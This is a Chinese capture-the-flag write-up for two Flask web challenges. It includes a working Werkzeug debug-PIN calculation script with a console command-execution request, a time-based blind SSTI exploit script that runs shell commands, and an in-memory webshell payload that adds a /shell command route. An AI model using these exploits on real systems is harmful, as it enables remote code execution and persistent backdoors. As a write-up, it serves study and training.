shctf week3-web

[Week3] 顰

flask算pin

https://werkzeug.palletsprojects.com/en/3.0.x/debug/

debug console的请求需要来自信任的host

添加header Host:127.0.0.1:port

因为每个请求都要host

所以写一个demo抓包来获取提交pin验证的参数以及执行命令的参数

1
2
3
4
5
6
7
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
    return 'test'
if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080, debug=True)

?__debugger__=yes&cmd=pinauth&pin=119-178-555&s=1aobhiUuRbIB9bPSOM2Z

(这串为SECRET = "1aobhiUuRbIB9bPSOM2Z";)看源码能找到

算pin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
import hashlib
from itertools import chain

def mac_to_decimal(mac_address):
    # 将 MAC 地址分割成十六进制对
    hex_pairs = mac_address.split(':')
    
    # 初始化十进制数值
    decimal_value = 0
    
    # 将每个十六进制对转换为十进制并累加
    for hex_pair in hex_pairs:
        decimal_value = (decimal_value << 8) + int(hex_pair, 16)
    
    return decimal_value

mac_address = "42:a8:3c:60:79:d0"  # /sys/class/net/eth0/address 

# 调用函数将 MAC 地址转换为十进制数值
mac = str(mac_to_decimal(mac_address))
 
probably_public_bits = [
    'root'  # username 可通过/etc/passwd获取
    'flask.app',  # modname默认值
    'Flask',  # 默认值 getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.10/site-packages/flask/app.py'  # 路径 可报错得到  getattr(mod, '__file__', None)
]
 
private_bits = [
     mac, #mac地址十进制
    'd45a88e1-3fe4-4156-9e59-3864587b7c87'
    # /proc/sys/kernel/random/boot_id + /proc/self/cgroup  (name=systemd:) /proc/self/cgroup为空不用看
]
 
# 下面为源码里面抄的,不需要修改
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
 
cookie_name = '__wzd' + h.hexdigest()[:20]
 
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
 
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
 
print(rv)

获取cookie

__wzd7601fb13e6a573dccdb2=1729661381|c7574ed074d1

根据demo获取传命令的参数

/console?&__debugger__=yes&cmd=open('/flag').read()&frm=0&s=1aobhiUuRbIB9bPSOM2Z

[Week3] love_flask

看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
@app.route('/')
def pretty_input():
    return render_template_string(html_template)

@app.route('/namelist', methods=['GET'])
def name_list():
    name = request.args.get('name')  
    template = '<h1>Hi, %s.</h1>' % name
    rendered_string =  render_template_string(template)
    if rendered_string:
        return 'Success Write your name to database'
    else:
        return 'Error'

if __name__ == '__main__':
    app.run(port=8080)

输入可控+渲染,明显ssti

但不同的是,没有return,也就是ssti的结果没有回显

可以看到没有任何的过滤

由于这里是格式化输入变量name,所以用不了条件或循环控制语句{% if %}``{% for %}

所以有2种办法

第一种

是盲注,因为渲染失败会返回500,所以可以根据返回状态码先爆出eval

/namelist?name={{().__class__.__base__.__subclasses__()[{{int(100-200)}}].__init__.__globals__['__builtins__']['eval']('__import__("time").sleep(3)')}}

接着通过构造延时来爆flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests
import time
flag ='SHCTF{'
table = '-ABCDEFabcdef0123456789'
url = 'http://210.44.150.15:25528/namelist?name='
for len in range(7,43):
    for i in table:
      ii = flag +i
      start_time = time.time()
      data = "{{"+"().__class__.__base__.__subclasses__()[100].__init__.__globals__['__builtins__']['eval']('__import__(\"os\").popen(\"if [ $(head -c {} /flag) = {} ]; then sleep 2; fi\").read()')".format(len,ii) +"}}"
      #print(data)
      url1 = url + data
      r = requests.get(url1)
      end_time = time.time()
      response_time = end_time - start_time
      if response_time >= 2:
          flag = flag +i
          print(flag)
      else:
          continue
print(flag+'}')

第2种

内存马

https://xz.aliyun.com/t/10933?time__1311=CqjxRQiQqQqqlxGg6QGCDcmQD80rdDCbAeD

内存马无需上传文件也不生成文件。内存马通过动态注册一个路由来作为执行命令参数的入口。
{{url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})}}

CTF > 比赛Write Up
#比赛Write Up
shctf week3-web
http://example.com/2024/11/22/shctf week3/
作者
J_0k3r
发布于
2024年11月22日
许可协议
BY J_0K3R